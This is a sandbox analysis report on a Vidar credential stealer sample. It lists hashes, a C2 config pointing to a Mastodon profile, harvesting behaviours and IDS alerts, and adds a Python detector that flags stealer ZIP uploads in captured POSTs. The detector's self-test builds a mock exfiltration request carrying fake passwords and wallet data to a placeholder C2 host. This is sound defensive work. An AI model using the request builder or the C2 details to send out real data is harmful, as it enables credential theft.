General

Target: eufive_20211018-171516
Size: 733KB
Sample: 211018-tser9sehbk
MD5: d74e7162c1b577a0afa55ff1a779bf24
SHA1: 70022590810fcfde937f3392b1f37d1b8e8c5227
SHA256: 50ca4376290ba797fb1084013cfffa0c58412da24fef17e37318fd80eef3493f
SHA512: 0c6fb8d1d01ee3ab5e11f33333851782a120eab204457f1061f59a7c2f95c5b2da1cbbad1ddff1a64542a9d43e45bb2938125559801400be7709dba7c69fc33e
Static task: static1
Behavioral task: behavioral1
Sample: eufive_20211018-171516.exe
Resource: win7-en-20210920
Malware Config

Extracted
Family: vidar
Version: 41.5
Botnet: 865
C2: https://mas.to/@xeroxxx
profile_id: 865

Note that the C2 value is a Mastodon profile URL, not the upload endpoint: Vidar builds of this era read the address of the actual panel from the text of that profile, so the host that receives the stolen data will only appear in the behavioral network traffic, not in the static config.
Targets

Target: eufive_20211018-171516
Size: 733KB
MD5: d74e7162c1b577a0afa55ff1a779bf24
SHA1: 70022590810fcfde937f3392b1f37d1b8e8c5227
SHA256: 50ca4376290ba797fb1084013cfffa0c58412da24fef17e37318fd80eef3493f
SHA512: 0c6fb8d1d01ee3ab5e11f33333851782a120eab204457f1061f59a7c2f95c5b2da1cbbad1ddff1a64542a9d43e45bb2938125559801400be7709dba7c69fc33e

- suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
- suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
- Vidar Stealer
- Downloads MZ/PE file
- Loads dropped DLL
- Accesses cryptocurrency files/wallets, possible credential harvesting
- Checks installed software on the system: looks up Uninstall key entries in the registry to enumerate software on the system.
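The two Suricata alerts above fire because the stealer ZIPs its harvested files and POSTs the archive to its panel, and the archive's local file headers carry cleartext entry names such as Passwords.txt. The following is an added example, not part of the sandbox report or of any Emerging Threats rule, showing how that check can be reproduced offline over a captured request: it walks the ZIP local file headers found in a POST body and reports entry names on a watchlist. The HTTP request, the host c2.example.invalid, the boundary string and the archive contents are all constructed for the example; the watchlist entries other than Passwords.txt are assumptions about typical stealer log names, not files recovered from this sample.

```python
"""Flag Vidar/Arkei-style stealer exfiltration in a captured HTTP POST.

Added example, not taken from the sandbox report.  All request data below is
constructed; the C2 host is a placeholder and nothing here is this sample's
real traffic.
"""
import io
import re
import struct
import zipfile

# Entry names to alert on.  "Passwords.txt" is the one named by the rule on
# the report page; the other two are assumed typical stealer log names.
WATCHLIST = {"passwords.txt", "information.txt", "cookies.txt"}

# Signature of a ZIP local file header ("PK\x03\x04").
ZIP_LOCAL_HEADER = re.compile(rb"PK\x03\x04")


def zip_entry_names(blob: bytes) -> list[str]:
    """Return entry names from every ZIP local file header found in blob.

    A local header is 30 bytes: signature, version, flags, method, mtime,
    mdate, crc32, compressed size, uncompressed size, name length (offset 26),
    extra length (offset 28); the name follows immediately.  Scanning for the
    signature rather than trusting the central directory keeps the check
    working on truncated captures, which is also how a content-match IDS rule
    sees the data.
    """
    names = []
    for m in ZIP_LOCAL_HEADER.finditer(blob):
        start = m.start()
        if start + 30 > len(blob):
            break
        (name_len,) = struct.unpack_from("<H", blob, start + 26)
        name = blob[start + 30:start + 30 + name_len]
        if name:
            names.append(name.decode("utf-8", errors="replace"))
    return names


def split_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode()
    return method.decode(), path.decode(), headers, body


def detect_stealer_upload(raw_request: bytes) -> dict:
    """Return the watchlisted entry names found in a POST body.

    Only POST bodies are examined, matching the "Outbound POST Request" scope
    of the alert; the same bytes in a GET are deliberately not flagged.
    """
    method, _path, _headers, body = split_http_request(raw_request)
    if method != "POST":
        return {"alert": False, "matches": [], "entries": []}
    entries = zip_entry_names(body)
    matches = [n for n in entries if n.rsplit("/", 1)[-1].lower() in WATCHLIST]
    return {"alert": bool(matches), "matches": matches, "entries": entries}


def build_sample_request(method: str = "POST") -> bytes:
    """Construct a multipart upload carrying a stealer-style ZIP (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("information.txt", "OS: Windows 7\n")            # constructed
        zf.writestr("Passwords.txt", "example.com\tuser\tpass\n")    # constructed
        zf.writestr("Wallets/exodus.seco", b"\x00" * 16)             # constructed
    archive = buf.getvalue()
    boundary = b"----ExampleBoundary"
    body = (
        b"--" + boundary + b"\r\n"
        b'Content-Disposition: form-data; name="file"; filename="data.zip"\r\n'
        b"Content-Type: application/octet-stream\r\n\r\n" + archive + b"\r\n"
        b"--" + boundary + b"--\r\n"
    )
    head = (
        f"{method} /upload HTTP/1.1\r\n"
        "Host: c2.example.invalid\r\n"  # placeholder, not this sample's panel
        "Content-Type: multipart/form-data; boundary=" + boundary.decode() + "\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


if __name__ == "__main__":
    print(detect_stealer_upload(build_sample_request()))
```

Because the match is on the local file header rather than on decompressed content, it works regardless of the compression method the stealer used, but it is equally easy to defeat: an archive with renamed entries, or one that is encrypted as a whole before upload, yields no hit, which is why the second alert on the page (the Vidar/Arkei client upload signature, keyed on the request shape rather than the file names) is the more durable of the two.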